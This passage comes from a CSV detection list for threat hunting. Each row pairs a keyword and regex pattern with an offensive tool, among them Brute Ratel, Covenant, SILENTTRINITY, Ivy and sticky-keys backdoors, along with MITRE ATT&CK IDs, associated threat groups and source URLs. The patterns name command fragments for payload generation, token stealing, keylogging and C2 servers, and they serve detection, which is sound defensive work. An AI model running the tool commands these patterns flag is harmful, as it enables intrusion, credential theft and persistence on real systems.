T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3367" "* ssl-cert-intaddr.nse*",".{0,1000}\sssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3368" "* ssl-date.nse*",".{0,1000}\sssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3369" "* ssl-dh-params.nse*",".{0,1000}\sssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3370" "* ssl-enum-ciphers.nse*",".{0,1000}\sssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3371" "* ssl-heartbleed.nse*",".{0,1000}\sssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3372" "* ssl-known-key.nse*",".{0,1000}\sssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3373" "* ssl-poodle.nse*",".{0,1000}\sssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3374" "* sslv2.nse*",".{0,1000}\ssslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3375" "* sslv2-drown.nse*",".{0,1000}\ssslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3376" "* SspiUacBypass *",".{0,1000}\sSspiUacBypass\s.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","3377" "* sstp-discover.nse*",".{0,1000}\ssstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3378" "* st client wss://*",".{0,1000}\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","3379" "* st teamserver *",".{0,1000}\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","3380" "* --stack-name catspin *",".{0,1000}\s\-\-stack\-name\scatspin\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","3381" "* --stageless --dotnetver * --payload *",".{0,1000}\s\-\-stageless\s\-\-dotnetver\s.{0,1000}\s\-\-payload\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","3382" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3383" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-process64\s.{0,1000}\.exe\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3384" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a 
payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3385" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3386" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3387" "* start covenant*",".{0,1000}\sstart\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","3388" "* start gs-sshd*",".{0,1000}\sstart\sgs\-sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind 
NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","3389" "* start_campaign.py*",".{0,1000}\sstart_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","3393" "* start_hidden_process*",".{0,1000}\sstart_hidden_process.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","3394" "* Starting Adaptive C2 Server on *",".{0,1000}\sStarting\sAdaptive\sC2\sServer\son\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - 
T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3395" "* Starting Badger Notification Handler for %s => {LHOST}:{LPORT}*",".{0,1000}\sStarting\sBadger\sNotification\sHandler\sfor\s\%s\s\=\>\s\{LHOST\}\:\{LPORT\}.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3396" "* Starting external c2 server on *",".{0,1000}\sStarting\sexternal\sc2\sserver\son\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3397" "* Starting pre2k spray against *",".{0,1000}\sStarting\spre2k\sspray\sagainst\s.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential 
Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","#content","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","3398" "* -start-keylogger*",".{0,1000}\s\-start\-keylogger.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3400" "* status gs-sshd*",".{0,1000}\sstatus\sgs\-sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","3401" "* StayKit.cna*",".{0,1000}\sStayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common 
Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","3402" "* -Steal -ProcessID *",".{0,1000}\s\-Steal\s\-ProcessID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3403" "* -Steal -ProcessID *",".{0,1000}\s\-Steal\s\-ProcessID\s.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","3404" "* steal_token /process:* /command:*",".{0,1000}\ssteal_token\s\/process\:.{0,1000}\s\/command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","3405" "* stealthily grabs passwords and browser history 
from windows systems*",".{0,1000}\sstealthily\sgrabs\s\spasswords\sand\sbrowser\shistory\sfrom\swindows\ssystems.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","3407" "* stickykey.ps1*",".{0,1000}\sstickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","3408" "* Stickykeys.sh*",".{0,1000}\sStickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","3409" "* Stompy.ps1*",".{0,1000}\sStompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","3410" "* StomPY.py *",".{0,1000}\sStomPY\.py\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","3411" "* stop 
covenant*",".{0,1000}\sstop\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","3412" "* -stop-keylogger*",".{0,1000}\s\-stop\-keylogger.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3415" "* striker.py*",".{0,1000}\sstriker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","3416" "* string DCSync(*",".{0,1000}\sstring\sDCSync\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - 
T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","3417" "* --string 'venomcoming' *",".{0,1000}\s\-\-string\s\'venomcoming\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","3418" "* --string 'venomleaving' *",".{0,1000}\s\-\-string\s\'venomleaving\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","3419" "* stun-info.nse*",".{0,1000}\sstun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3420" "* stun-version.nse*",".{0,1000}\sstun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
